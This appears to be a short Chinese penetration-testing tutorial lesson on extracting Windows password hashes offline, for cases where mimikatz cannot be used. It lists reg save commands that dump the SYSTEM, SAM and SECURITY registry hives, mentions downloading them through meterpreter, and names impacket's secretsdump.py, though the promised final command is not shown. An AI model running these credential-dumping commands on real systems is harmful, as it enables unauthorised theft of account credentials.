第五十六课:离线提取目标机hash
很多环境下,不允许上传或者使用 mimikatz。而针对非域控的单机离线提取 hash 显得尤为重要。
reg save 方式使得需要下载的目标机hash文件更小。
reg save HKLM\SYSTEM sys.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv
meterpreter下自带download功能。
离线提取:
本季用到的是 impacket 的 secretsdump.py。Kali默认路径:/root/impacket/examples/secretsdump.py
命令如下:
Micropoor
Last updated